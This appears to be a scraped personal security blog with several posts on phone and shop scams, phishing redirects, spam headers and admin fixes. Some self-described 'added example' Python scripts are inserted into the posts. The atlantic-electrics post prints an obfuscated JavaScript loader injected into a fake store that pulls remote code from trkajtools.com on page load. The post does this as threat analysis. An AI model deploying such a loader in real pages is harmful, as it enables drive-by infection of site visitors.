“01263 402788” TalkTalk Western Union scammers

It has been a while since I’ve had a report of one of these.. but today there was a victim.

The victim had a call from 01263402788 from someone claiming to be from TalkTalk.
The caller reportedly knew the make and model of the victim's TalkTalk router and claimed there had been an ongoing fault that needed repairing.

They talked the victim through loading up TeamViewer and then Ammyy remote admin tools and did the fairly standard tech support scammer tricks of showing event viewer etc.

This is where the scam then pivots. They ask the victim to turn off their tablets and mobile phone (more on this later!) while they scan and fix the problem. They then claimed that the problem had been fixed and as compensation they would refund £200 to the victim/customer.

They then asked the customer to log into their internet banking to check if the refund had come through – all whilst they are connected via remote control to the victim's computer. Once the victim has logged in they distract them with conversations or tasks while the scammer transfers £1200 between the victim's own accounts (not sure what happens if there isn't any other account or funds available). They then ask the victim to check the payment has come in.

Victim doesn’t notice that the payment has just been shuffled from their own accounts.. but does comment that “oh, I think you’ve overpaid me! It has come up as £1200, not £200”.

The scammer then goes on the guilt trip claiming he made a mistake and needs the money back as soon as possible otherwise he will lose his job. “The safest way to do this” is to use Western Union.
Victim believes the scammer, somehow didn't get talked into doing the transaction on the Western Union online site (which has been the previous method) but instead is given the address of the nearest Western Union shop.

Victim goes – sends back the supposedly overpaid £1,000… scam is complete :(

In this instance the payment request was to a “James Odhiambo” in Kenya.. almost certainly a person who does not really exist and the payment won’t be collected from a WU shop in Kenya.

Posted in Uncategorized | Leave a comment

Suspicious online store “www.atlantic-electrics.com”, “bidtravel@ya.ru” and “trkajtools.com”

Today I came across another suspicious website. This one is advertising on Amazon and other locations:

[Image: atlantic electrics advert.png]

The website advertised is “www.atlantic-electrics.com”.. upon further inspection the following are red flags:

  • The domain has only been registered since 26th October 2017.. Not even two weeks old at the time of writing.
  • The domain uses “bitcoin-dns hosting”.. bitcoin doesn’t, yet, have much legitimate use.. The person hosting this website is paying by an anonymous payment method.
  • At the time of writing visitors are just being shown a proxied version of the co-op electrical website with one bit of injected code:

    <script>
    var CIfRD = ['h,t,t,p,s,:,/,/,t,r,k,a,j,t,o,o,l,s,.,c,o,m,/,f,l,a,s,h,/,u,p,d,a,t,e'];
    var lF = CIfRD.join('').replace(/,/g,'');
    function bGZxEi() {
      function GN(jrekWr) {
        var NeSHCgurTf= document.createElement('script');
        NeSHCgurTf.setAttribute('type', 'text/javascript');
        NeSHCgurTf.setAttribute('src', jrekWr);
        if (typeof NeSHCgurTf != 'undefined'){document.getElementsByTagName('body')[0].appendChild(NeSHCgurTf)};
      }
      GN(lF)
    }
    if (window.addEventListener) {window.addEventListener('load', bGZxEi, false);}
    else if (window.attachEvent) {window.attachEvent('onload', bGZxEi);}
    else if (window.onLoad) {window.onload = bGZxEi; }
    </script>

In short the code injected into the page requests javascript from:

hxxps://trkajtools.com/flash/update

UPDATE 2017-11-14: This has now changed and is injecting..

<script src='https://mobileinstore.co.uk/Loaded'></script>

Right now the above page is just serving a 0 byte file or rejecting the connection entirely.
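As an added example (this is not code from the post, nor anything taken from the sites discussed), here is a small Python script that pulls the remote script URLs out of a fetched page: it collects plain <script src> tags and also rebuilds strings that were stored as comma-separated characters, which is how the loader above hides the hxxps://trkajtools.com/flash/update address. The sample page is constructed inline from the snippet quoted above and the update.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not fetched from anywhere): the loader <script>
# quoted in the post, plus the plain <script src> form from the update.
SAMPLE_PAGE = """<html><body><h1>Store</h1>
<script>var CIfRD = ['h,t,t,p,s,:,/,/,t,r,k,a,j,t,o,o,l,s,.,c,o,m,/,f,l,a,s,h,/,u,p,d,a,t,e'];var lF = CIfRD.join('').replace(/,/g,'');function bGZxEi() { function GN(jrekWr) {var NeSHCgurTf= document.createElement('script');NeSHCgurTf.setAttribute('type', 'text/javascript');NeSHCgurTf.setAttribute('src', jrekWr);if (typeof NeSHCgurTf != 'undefined'){document.getElementsByTagName('body')[0].appendChild(NeSHCgurTf)};}GN(lF)}if (window.addEventListener) {window.addEventListener('load', bGZxEi, false);} else if (window.attachEvent) {window.attachEvent('onload', bGZxEi);} else if (window.onLoad) {window.onload = bGZxEi; } </script>
<script src='https://mobileinstore.co.uk/Loaded'></script>
</body></html>"""

# A single-quoted string made of characters separated by commas: 'h,t,t,p,...'
SPLIT_STRING = re.compile(r"'((?:[^',\\],){3,}[^',\\])'")
URL = re.compile(r"https?://[\w.-]+(?:/[^\s'\"]*)?")


class ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external <script src=...> values."""

    def __init__(self):
        super().__init__()
        self.inline = []
        self.external = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def decode_split_strings(js):
    """Rebuild strings stored as comma-separated characters ('a,b,c' -> 'abc')."""
    return [m.group(1).replace(",", "") for m in SPLIT_STRING.finditer(js)]


def find_loaders(html):
    """Return (kind, url) for every remote script the page would load.

    kind is 'static' for a plain src attribute, 'dynamic' when the URL is
    hidden in an inline script that creates a <script> element at runtime.
    """
    parser = ScriptCollector()
    parser.feed(html)
    hits = [("static", src) for src in parser.external]
    for body in parser.inline:
        dynamic = "createElement('script')" in body.replace('"', "'")
        for s in decode_split_strings(body):
            if URL.fullmatch(s):
                hits.append(("dynamic" if dynamic else "string", s))
    return hits


if __name__ == "__main__":
    for kind, url in find_loaders(SAMPLE_PAGE):
        print(f"{kind:8} {url}")
```

Run against a saved copy of a suspect page it lists every third-party script the page would pull in, so a proxied storefront that quietly adds one extra loader stands out immediately.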

I will come back to the trkajtools.com domain later, but for the moment let’s go back to atlantic-electrics.com.

The domain is registered with the following interesting information:

The email address “eugeneigibbons9@gmail.com”
The postcode “TS20 9GD”
The email address “bidtravel@ya.ru” (Associated with the bitcoin-dns account).

eugeneigibbons9@gmail.com
This e-mail address has been used to register two other suspicious domains of UK retailers…

https://currys.biz – a take on the name of "Currys PC World" in the UK. This site seems to just proxy through to eBuyer (another UK online electronics retailer) but also injects the "trkajtools" javascript.

https://pixmania.biz – another UK retailer.. this website currently proxies through to “coolshop” (whoever they are) and also injects the “trkajtools” javascript.

“TS20 9GD” – a postcode in the UK format however this postcode does not exist!

“bidtravel@ya.ru”
An email address associated with many writeups about sites using the Angler exploit kit.
This e-mail address is also associated with trkajtools.com

The website www.atlantic-electrics.com is hosted at 45.76.134.125 (“45.76.134.125.vultr.com”) and does not seem to host anything else.

So.. going back to “trkajtools.com”
This domain was purchased on 17th October 2017 and little intelligence exists about it. The only thing on Google was the urlquery report that I ran on the domain earlier in the day. The domain also uses "bitcoin-dns.hosting".

The website trkajtools.com is hosted at 45.76.135.68 (“45.76.135.68.vultr.com”) and also does not seem to host anything else.

Summary

A lot of malicious or suspicious websites I find have a clear motive.. ones targeting electronics retail are normally there to steal credit card details or just trick visitors into sending money with no intention of shipping goods.
The atlantic-electrics website is far more ambiguous. It seems like a lot of effort to just infect a few people with an exploit kit whilst serving a page from a genuine retailer.
Possibly they plan to infect people while they investigate available websites and then skim the payment details once they place an order on a genuine website?

Maybe what is currently in place is just temporary and the website flips to being much more malicious at certain times of day or days of the week?


Fix for Wireshark error “wireshark api-ms-win-crt-runtime”

Some of my systems have been giving the error “The program can’t start because api-ms-win-crt-runtime-l1-1-0.dll is missing from your computer. Try reinstalling the program to fix this problem.” after updating Wireshark.. took me a while to identify why.

Simple once you find the fix!

You need the “Update for Universal C Runtime in Windows”:

https://support.microsoft.com/en-us/kb/2999226

Thanks to Adobe for documenting this simply.

The above referenced Microsoft Update file also fixes a problem where Outlook may report “Either there is no default mail client or the current mail client cannot fulfill the messaging request. Please run Microsoft Outlook and set it as the default mail client.” if you have Office 2016.


Hotels.com send spam from their China division to Lord of the Rings Online hacked email addresses!

Simple as that.. a unique address I used with Lord of the Rings Online, an online game, was sent official hotels.com spam in Chinese.

Received: from mta.email.hotels.com (mta.email.hotels.com [66.231.82.111])
	by my.mail.host with ESMTPS
	(version=TLSv1 cipher=ECDHE-RSA-AES256-SHA bits=256)
	; Sat, 23 Sep 2017 00:26:08 +0100
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=200608; d=mail.hotels.com;
 h=From:To:Subject:Date:List-Unsubscribe:MIME-Version:List-ID:Reply-To:Message-ID:Content-Type; i=info@mail.hotels.com;
 bh=DKTe3QJJazkAFXWyK6zHLxUqYdg=;
 b=UGXslgLXZ6IoUGRs5Eh5UtQAuQrBL+8ydzsdoOkP7jE100jtL/bjyCFHe4NMSFaE5PBq5AehwbCq
   OlVJ/8rljVaMUOP+yVNb0v8EBw04e6LjQQiqR+T5Z2atUf7rOz1MhabG0gH0o8G/IHCH1g/MEAnJ
   4xeOZGu6jcSXLzLs4C0=
DomainKey-Signature: a=rsa-sha1; c=nofws; q=dns; s=200608; d=mail.hotels.com;
 b=BJPNLB1/Wbc7dvpS/B3JPoSdcDCgnx3dlMgyqjbOJOG0ev6Aj8Lwrsi+GUnLiWzpzPvyjE8M/9Ia
   0rkNniYHQxJSVnErrzFPuEp127iaZciZQY6Tyhw2yZtXjv5ojJLqGgqfCESdii0a7US8MgeLu3Bz
   y4vfjFJy7W7hRHb8iQ8=;
Received: by mta.email.hotels.com id home1o163hs1 for <lorto@mydomain.here>; Fri, 22 Sep 2017 17:25:59 -0600 (envelope-from <bounce-1935712_HTML-1649075358-21435338-177351-13256@bounce.mail.hotels.com>)
From: =?UTF-8?B?SG90ZWxzLmNvbSDkuK3lm70=?=
 <info@mail.hotels.com>
To: <lorto@mydomain.here>
Subject: =?UTF-8?B?54++5Zyo6KiC77yM6aas5LiK55yB77yB?=
Date: Fri, 22 Sep 2017 17:25:58 -0600
List-Unsubscribe: <mailto:leave-redacted@leave.mail.hotels.com>
MIME-Version: 1.0
List-ID: <177351_21435338.xt.local>
X-CSA-Complaints: whitelistcomplaints@eco.de
x-job: 177351_21435338
Reply-To: =?UTF-8?B?SG90ZWxzLmNvbSDkuK3lm70=?=
 <reply-fe6216717167017e761c-1935712_HTML-1649075358-177351-13256@mail.hotels.com>
Message-ID: <95548813-ed9d-4c9f-ba06-905e53afb96e@xtinmta4198.xt.local>
Content-Type: multipart/alternative;
	boundary="kgwiAGSMgprd=_?:"
Return-Path: bounce-1935712_HTML-1649075358-21435338-177351-13256@bounce.mail.hotels.com

[Image: hotels dot com spam to lort lord of rings online.png]

Poor show and amazing that a large company doesn’t care where they source their mailing lists or even check or require double-opt in confirmation.
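An added example, not part of the original post: a Python script that decodes the RFC 2047 encoded-words in the From and Subject headers, pulls the connecting IP out of the topmost Received line, and looks up which service the tagged recipient address was handed to. The headers are a cut-down copy of those quoted above (signatures omitted) and the address book is a constructed placeholder.

```python
import re
from email import message_from_string, policy

# Constructed sample: the headers quoted in the post, cut down to the ones
# this script looks at (the DKIM and DomainKey signatures are omitted).
RAW_HEADERS = (
    "Received: from mta.email.hotels.com (mta.email.hotels.com [66.231.82.111])\n"
    "\tby my.mail.host with ESMTPS\n"
    "\t(version=TLSv1 cipher=ECDHE-RSA-AES256-SHA bits=256)\n"
    "\t; Sat, 23 Sep 2017 00:26:08 +0100\n"
    "Received: by mta.email.hotels.com id home1o163hs1 for <lorto@mydomain.here>;"
    " Fri, 22 Sep 2017 17:25:59 -0600\n"
    "From: =?UTF-8?B?SG90ZWxzLmNvbSDkuK3lm70=?=\n"
    " <info@mail.hotels.com>\n"
    "To: <lorto@mydomain.here>\n"
    "Subject: =?UTF-8?B?54++5Zyo6KiC77yM6aas5LiK55yB77yB?=\n"
    "Date: Fri, 22 Sep 2017 17:25:58 -0600\n"
    "List-Unsubscribe: <mailto:leave-redacted@leave.mail.hotels.com>\n"
    "Return-Path: bounce-1935712_HTML-1649075358-21435338-177351-13256"
    "@bounce.mail.hotels.com\n"
    "\n"
)

# Constructed address book: which service each tagged local part was given to.
ADDRESS_BOOK = {"lorto": "Lord of the Rings Online"}

RELAY_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def analyse(raw_headers, address_book):
    """Decode the sender and subject and work out where the address leaked from."""
    msg = message_from_string(raw_headers, policy=policy.default)
    sender = msg["From"].addresses[0]
    recipient = msg["To"].addresses[0]
    received = msg.get_all("Received") or []
    # The topmost Received line was written by our own MX, so the address in
    # it is the host that actually connected to us (later ones are hearsay).
    m = RELAY_IP.search(received[0]) if received else None
    subject = str(msg["Subject"])          # policy.default decodes encoded-words
    tag = recipient.addr_spec.split("@", 1)[0]
    return {
        "from_name": sender.display_name,
        "from_addr": sender.addr_spec,
        "subject": subject,
        "non_ascii_subject": any(ord(ch) > 127 for ch in subject),
        "relay_ip": m.group(1) if m else None,
        "recipient_tag": tag,
        "address_given_to": address_book.get(tag, "unknown"),
        "has_unsubscribe": msg["List-Unsubscribe"] is not None,
    }


if __name__ == "__main__":
    for key, value in analyse(RAW_HEADERS, ADDRESS_BOOK).items():
        print(f"{key:18} {value}")
```

Using one unique local part per service, as the post does, is what makes the last two fields meaningful: the moment mail arrives for a tag that was only ever given to one site, you know whose list was sold or stolen.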


How to list available wifi access points on ZeroShell

If you use ZeroShell and want to see which wireless access points are visible to it, the web interface doesn't let you do anything wifi related.

The SSH “push button” interface also doesn’t offer this function.

You do have to use the shell!

ifconfig wlan0 up
iwlist wlan0 scan | grep 'Encryption key' -A 1 -B 1
ifconfig wlan0 down

Which should return something similar to this:

root@myrouter ~> iwlist wlan0 scan | grep 'Encryption key' -A 1 -B 1
Quality=20/70 Signal level=-90 dBm
Encryption key:off
ESSID:"BTWiFi-with-FON"
--
Quality=35/70 Signal level=-75 dBm
Encryption key:on
ESSID:"virginmedia8106815"
--
Quality=22/70 Signal level=-88 dBm
Encryption key:on
ESSID:"DIRECT-76-HP OfficeJet Pro 6960"
--
Quality=26/70 Signal level=-84 dBm
Encryption key:off
ESSID:"BTWiFi"
--

This shows the name of each network and whether it has encryption (a password) enabled.
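An added example, not from the post or from ZeroShell: a Python parser for iwlist output, fed here with the scan output shown above, that lists the networks, picks out the open (unencrypted) ones and the strongest signal. live_scan() wraps the three commands above and needs root on the router.

```python
import re
import subprocess

# Constructed sample: the grep-filtered scan output shown in the post,
# used here instead of a live `iwlist wlan0 scan`.
SAMPLE_SCAN = """\
Quality=20/70 Signal level=-90 dBm
Encryption key:off
ESSID:"BTWiFi-with-FON"
--
Quality=35/70 Signal level=-75 dBm
Encryption key:on
ESSID:"virginmedia8106815"
--
Quality=22/70 Signal level=-88 dBm
Encryption key:on
ESSID:"DIRECT-76-HP OfficeJet Pro 6960"
--
Quality=26/70 Signal level=-84 dBm
Encryption key:off
ESSID:"BTWiFi"
--
"""

QUALITY = re.compile(r"Quality=(\d+)/(\d+)")
SIGNAL = re.compile(r"Signal level=(-?\d+) dBm")
ESSID = re.compile(r'ESSID:"(.*)"')


def parse_scan(text):
    """Turn iwlist output (raw or grep-filtered) into one dict per network.

    In wireless-tools output the ESSID line comes after the Quality and
    Encryption lines of a cell, so it is used to close each record.
    """
    networks, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        m = QUALITY.search(line)
        if m:
            current["quality"] = round(int(m.group(1)) / int(m.group(2)), 2)
        m = SIGNAL.search(line)
        if m:
            current["signal_dbm"] = int(m.group(1))
        if line.startswith("Encryption key:"):
            current["encrypted"] = line.endswith(":on")
        m = ESSID.search(line)
        if m:
            current["essid"] = m.group(1)
            networks.append(current)
            current = {}
    return networks


def open_networks(networks):
    """ESSIDs that advertise no encryption at all."""
    return [n["essid"] for n in networks if not n.get("encrypted", False)]


def strongest(networks):
    """ESSID with the best (least negative) signal level."""
    return max(networks, key=lambda n: n["signal_dbm"])["essid"]


def live_scan(iface="wlan0"):
    """The post's three commands, run from Python (needs root on the router)."""
    subprocess.run(["ifconfig", iface, "up"], check=True)
    try:
        out = subprocess.run(["iwlist", iface, "scan"], check=True,
                             capture_output=True, text=True).stdout
    finally:
        subprocess.run(["ifconfig", iface, "down"], check=True)
    return parse_scan(out)


if __name__ == "__main__":
    for n in parse_scan(SAMPLE_SCAN):
        state = "encrypted" if n["encrypted"] else "OPEN"
        print(f'{n["essid"]:35} {state:9} {n["signal_dbm"]} dBm')
```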


Fake virus warning on “s3-74-183-24-164-ap-southeast-2-amazonaws-com.ga” leading to tech support scam number.

A very unusual way I came across this one. I have several Google Alerts set up for keywords.. Google emailed me an alert for a very, very obscure search that I had set up.

Although it was unlikely to be a sensible result, I was still interested. The URL Google had indexed and alerted on was:

hxxp://www.sukhiporibar.com/rosoiew/oyptke.php?br=my-keywords-here&ct=ga

This appears to now be just a wordpress(?) site but at the time I got the alert it was forwarding on to:

coolinaas.pw
then
http://www.cpm10.com
then
normasimpson.info
then
s3-74-183-24-164-ap-southeast-2-amazonaws-com.ga

The full URL of:

hxxps://s3-74-183-24-164-ap-southeast-2-amazonaws-com.ga/loginerror10.com/ts-chrome-engnew201/?n=0800%20046%205257

Needless to say the message that then comes up is a fake virus warning along with an audio clip telling you to call "support.Windows.com" on "0800 046 5257" (a UK freephone number).


Direction to manually create a migration endpoint “This Topic Is No Longer Available” help..

If you try to create a migration endpoint on Office 365 to migrate users from an existing exchange server and it fails – Microsoft tries to tell you to view the following URL: https://technet.microsoft.com/library/jj874458(v=exchg.150).aspx

However.. the page doesn’t exist! Thanks Microsoft.

However the following page seems to contain a lot of the information that I _think_ might have been on the above URL:

https://blogs.technet.microsoft.com/exovoice/2016/09/19/troubleshooting-issues-where-the-migration-endpoint-cannot-be-created-in-hybrid-scenarios/


Mirror: Two Ways To Push Wlan Profiles To Your Windows Devices

This is a mirror of what used to be on the URL http://www.commsolutions.com/2012/09/two-ways-to-push-wlan-profiles-to-your-windows-devices/

I did not write the content and claim no praise for it.. The above URL appears to no longer be valid and the information doesn’t seem to exist on any other website other than archive.org. I am also posting a copy here should the archive.org version expire or be unavailable for some reason.

Content originally by Comm Solutions.

Today we’ll look at two ways besides Aruba’s QuickConnect or CloudPath to push WLAN profiles to your Windows devices….

CONFIGURING WLAN POLICIES VIA GROUP POLICY FOR DOMAIN MEMBER WINDOWS CLIENTS:

Within a Windows Server and Active Directory domain, Group Policy allows you to push network profiles to domain-joined computers. You can do this by container or globally, by specifying wireless settings for clients running Windows 7, Windows Vista, Windows XP, as well as Server 2008 versions (although I don’t know of too many 2008 Servers running WLAN cards…)

If your domain controllers are Windows Server 2003/2003R2, the Active Directory schema has to have been extended to add the wireless GPO support, and you’re better off to run the GPO plugin on a Vista/Win7 machine to ensure that WPA2 support exists. Open the Microsoft Management Console (MMC), open the Group Policy snap-in, navigate to Computer Configuration>Windows Settings>Security Settings>Wireless Network (IEEE 802.11) Policies, and begin your WLAN configuration.

If your domain controllers are Windows Server 2008/2008R2, use the Group Policy Management Console (GPMC) and navigate to Computer Configuration>Policies>Windows Settings>Security Settings>Wireless Network (IEEE 802.11) Policies, and create policies for XP and/or your Win7/Vista clients.

NON-DOMAIN/NON-ACTIVE DIRECTORY WINDOWS PROFILE EXPORT/IMPORT:

For non-domain machines, you can configure the wireless settings via the Netsh tool. This works for clients running Windows Vista/Win7 and perhaps Win8. You can run the commands locally on a machine to create the export, and on each new client machine locally or remotely via a share/UNC. You can manually type the import or script them in your batch files or login script.

The Netsh tool doesn't let you directly configure a whole lot of anything but it lets you export an existing wireless profile (and this same process can be utilized to sync IAS/NPS servers, but that's another story) and import it into other machines (and a similar process can be utilized to sync IAS/NPS server configurations, but that's another tech tip). So we need to first export the configuration from a working client that has had a profile created for the desired ESSID/WLAN.

You can display the configured WLAN network profile(s) with the following command:

netsh wlan show all

Now you can export the desired profile, using the profile name as listed by the previous command:

netsh wlan export profile name=PROFILE_NAME

On other machines you can now import the profile using the filename of the XML file you exported from the source machine:

netsh wlan add profile filename="WLANPROFILE.xml"

Using remote netsh you can also import to a remote computer on the network:

netsh wlan add profile filename="WLANPROFILE.xml" -r COMPUTER_NAME -u DOMAIN\USERNAME -p PASSWORD
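An added example, not part of the mirrored Comm Solutions article: a Python script that inspects an exported WLAN profile XML before you copy it around or push it to other machines, reporting the profile name, SSID, authentication and encryption and warning when the key material is in clear text (which is what an export run with key=clear produces) or when a legacy cipher is configured. The profile XML is a constructed sample in the format netsh writes; the SSID, name, key and the "protected" blob are invented.

```python
import xml.etree.ElementTree as ET

NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# Constructed sample in the layout `netsh wlan export profile ... key=clear`
# writes; profile name, SSID and passphrase are invented for the example.
SAMPLE_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>HomeWiFi</name>
  <SSIDConfig>
    <SSID>
      <hex>486F6D6557694669</hex>
      <name>HomeWiFi</name>
    </SSID>
  </SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM>
    <security>
      <authEncryption>
        <authentication>WPA2PSK</authentication>
        <encryption>AES</encryption>
        <useOneX>false</useOneX>
      </authEncryption>
      <sharedKey>
        <keyType>passPhrase</keyType>
        <protected>false</protected>
        <keyMaterial>correct horse battery staple</keyMaterial>
      </sharedKey>
    </security>
  </MSM>
</WLANProfile>
"""

# The same profile exported without key=clear: the key is an opaque protected
# blob (PLACEHOLDER below stands in for the real encrypted value).
PROTECTED_PROFILE = SAMPLE_PROFILE.replace(
    "<protected>false</protected>", "<protected>true</protected>"
).replace("correct horse battery staple", "PLACEHOLDER_PROTECTED_KEY_BLOB")

LEGACY_AUTH = {"open", "shared", "WPA", "WPAPSK"}
LEGACY_ENC = {"none", "WEP", "TKIP"}


def inspect_profile(xml_text):
    """Summarise a WLAN profile and list anything worth knowing before import."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    auth = text("w:MSM/w:security/w:authEncryption/w:authentication")
    enc = text("w:MSM/w:security/w:authEncryption/w:encryption")
    protected = text("w:MSM/w:security/w:sharedKey/w:protected")
    key = text("w:MSM/w:security/w:sharedKey/w:keyMaterial")

    findings = []
    if key and protected == "false":
        findings.append("key material is in clear text: treat this file as a secret")
    if auth in LEGACY_AUTH:
        findings.append(f"weak or no authentication: {auth}")
    if enc in LEGACY_ENC:
        findings.append(f"weak or no encryption: {enc}")

    return {
        "name": text("w:name"),
        "ssid": text("w:SSIDConfig/w:SSID/w:name"),
        "auth": auth,
        "encryption": enc,
        "key_protected": protected == "true",
        "findings": findings,
    }


if __name__ == "__main__":
    for label, xml_text in (("key=clear export", SAMPLE_PROFILE),
                            ("protected export", PROTECTED_PROFILE)):
        print(label, inspect_profile(xml_text))
```

Pointing inspect_profile at every XML file in the export folder before they go onto a share or into a login script tells you which ones carry a passphrase in the clear, so those can be restricted to the machines that need them rather than left world-readable.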


Asterisk voicemail hangs up on callers after a few seconds.

I’ve spent about an hour and a half on this problem and the internet has nearly no results on how to fix the issue so I’m going to post the solution.

Problem

Phone system based on asterisk 1.8 (running on OpenWRT on an AMD Geode ALIX box) is working fine for all internal calls, external to internal calls and internal to external calls.

Internal calls to voicemail work

External calls to voicemail play the greeting and ask the caller to record a message. Asterisk records 1 or 2 seconds of audio and then the caller gets cut off.

Asterisk reports:

[May  9 22:57:09] WARNING[3547]: app.c:977 __ast_play_and_record: No audio available on SIP/siptrunkprovider-1-00000005??

If you enable debug logging you see a bit more information that you think might point you in the right direction..

[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to write format alaw
[May 9 22:57:04] DEBUG[3547]: app.c:1490 ast_lock_path_lockfile: Locked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:04] DEBUG[3547]: app.c:1507 ast_unlock_path_lockfile: Unlocked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to write format gsm
[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to write format alaw
[May 9 22:57:04] DEBUG[3547]: app.c:894 __ast_play_and_record: play_and_record: <None>, /var/spool/asterisk/voicemail/default/0404/tmp/1s4hH1, 'wav49|gsm|wav'
[May 9 22:57:04] DEBUG[3547]: app.c:918 __ast_play_and_record: Recording Formats: sfmts=wav49
[May 9 22:57:04] DEBUG[3547]: dsp.c:489 ast_tone_detect_init: Setup tone 1100 Hz, 500 ms, block_size=160, hits_required=21
[May 9 22:57:04] DEBUG[3547]: dsp.c:489 ast_tone_detect_init: Setup tone 2100 Hz, 2600 ms, block_size=160, hits_required=116
[May 9 22:57:04] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to read format slin
[May 9 22:57:07] DEBUG[3547]: app.c:974 __ast_play_and_record: One waitfor failed, trying another
[May 9 22:57:09] WARNING[3547]: app.c:977 __ast_play_and_record: No audio available on SIP/siptrunkprovider-1-00000005??
[May 9 22:57:09] DEBUG[3547]: channel.c:5297 set_format: Set channel SIP/siptrunkprovider-1-00000005 to read format alaw
[May 9 22:57:09] DEBUG[3547]: app.c:1490 ast_lock_path_lockfile: Locked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:09] DEBUG[3547]: app.c:1507 ast_unlock_path_lockfile: Unlocked path '/var/spool/asterisk/voicemail/default/0404/INBOX'
[May 9 22:57:09] DEBUG[3547]: app_voicemail.c:4917 sendmail: Attaching file '/var/spool/asterisk/voicemail/default/0404/INBOX/msg0000', format 'WAV', uservm is '2048', global is 2048
[May 9 22:57:09] DEBUG[3547]: app_voicemail.c:4928 sendmail: Sent mail to voicemaildestination@domain.com with command '/usr/sbin/sendmail -t'
[May 9 22:57:09] DEBUG[3547]: pbx.c:5544 __ast_pbx_run: Spawn extension (default,main,3) exited non-zero on 'SIP/siptrunkprovider-1-00000005'
[May 9 22:57:09] DEBUG[3547]: channel.c:2735 ast_softhangup_nolock: Soft-Hanging up channel 'SIP/siptrunkprovider-1-00000005'
[May 9 22:57:09] DEBUG[3547]: channel.c:2884 ast_hangup: Hanging up channel 'SIP/siptrunkprovider-1-00000005'
[May 9 22:57:09] DEBUG[3547]: chan_sip.c:6534 sip_hangup: Hangup call SIP/siptrunkprovider-1-00000005, SIP callid 2017050923565400001@2700-0344-0103-283
[May 9 22:57:09] DEBUG[3547]: chan_sip.c:6150 update_call_counter: Updating call counter for incoming call
[May 9 22:57:09] DEBUG[3547]: res_rtp_asterisk.c:2604 ast_rtp_remote_address_set: Setting RTCP address on RTP instance '0x88152e8'
[May 9 22:57:09] DEBUG[3547]: chan_sip.c:3526 __sip_xmit: Trying to put 'BYE sip:201' onto UDP socket destined for 81.158.130.1:5060

Attempts to fix it.

I tried so many things including changing to “minivm”, changing the recording format, trying to turn off silence detection in voicemail and installing other codecs / translators.

None of this helped. The only other hint I had was watching wireshark on the RTP ports. I could see that as soon as Asterisk started recording the voicemail it stopped sending packets to the SIP provider while the SIP provider continued to send RTP data for a few more seconds… then the call would get cut off.

I knew this wasn’t a SIP provider bug or problem as I have another Asterisk system on a different version of Asterisk and running on a traditional computer which does not exhibit the same problem.

Thinking that the problem was likely something to do with the audio data / RTP stream I searched around using many other keywords. I wanted to work out how to make Asterisk send either silence or comfort noise while it was recording the voicemail.

Eventually I googled for the correct magic keyword “asterisk send audio while recording” and came across this post:
https://www.spinics.net/lists/asterisk/msg168788.html

SOLUTION

It took so long to get to this point but I'm glad I continued.

The solution is to edit or add this line into your asterisk.conf in /etc/asterisk (or wherever you keep your asterisk config files):

transmit_silence = yes

The documentation in the config file notes:

Transmit silence while a channel is in a waiting state, a recording only state, or
when DTMF is being generated. Note that the silence internally is generated in raw signed
linear format. This means that it must be transcoded into the native format of the
channel before it can be sent to the device.
It is for this reason that this is optional, as it may result in requiring a temporary codec translation path for a channel that may not otherwise require one.

I hope this page helps someone!


Low value goods scam. (ebuy2016.com / kf@onlinezh.net)

Hello everyone. This is another scam that works similarly to a previous "high value electronics goods scam" that I've written about in the past. The websites, mostly, look professional and genuine. They take payment and then _never_ send any goods.

This scam seems to revolve around very small transactions (probably small enough that the credit card companies eat the fraud rather than charge it back to the fraudulent retailer). Or possibly they hope that the victims can’t be bothered with the paperwork and phone calls to report the fraud.

Most of the goods on the websites are around £30 to £150ish with a rare few slightly higher priced goods mixed in. The page and form asking for credit / debit card payment isn't even https / secure.

The good news – if you are a victim and you paid by Credit Card (or possibly even Debit Card) your bank is required to refund you!

http://www.ebuy2016.com/ – Seems to focus specifically on USB portable hard disks. Confirmed by victims as a scam.

http://www.betsbuyer.co.uk/ – Seems to sell GPS devices and sports “smart” watches.

http://www.top10tablet.us/ – Seems to sell Samsung Android tablets.

The first two of the above were registered 8th June 2016. The tablet site seems to have been registered 3rd November 2016. All are associated with the same domain registrant and / or have shared code between the domains.

Registered a month before is

https://www.prezzoshop.net/ – This appears to be the main domain name associated with the web hosting account and is another USB portable hard disk scam site aimed at victims in Italy. (162.218.179.41)

Other domains associated with the same scam:

http://www.prixonline.net – Seems to be aimed at French victims.

http://www.solde-tablette.com/ – Another site aimed at French victims.

http://www.tabprix.com/ – Another site aimed at French victims.

http://www.maillot-de-football.com/ – Football kit site aimed at French victims.

http://www.perruque-prix.fr/ – A hair / wig site aimed at French victims.

http://www.shopsunglass.net/ – Sunglasses store aimed at UK victims.

http://www.top-external-hard-drives.com/ – A copy of the portable hard disk scam site above.

http://www.nmdsneakers.com/ – Supposedly selling designer shoes / sneakers to US victims.

http://www.bayernoutlet.com – Another football kit scam site aimed at US victims. This domain is easily attributed to the www.nmdsneakers.com domain.

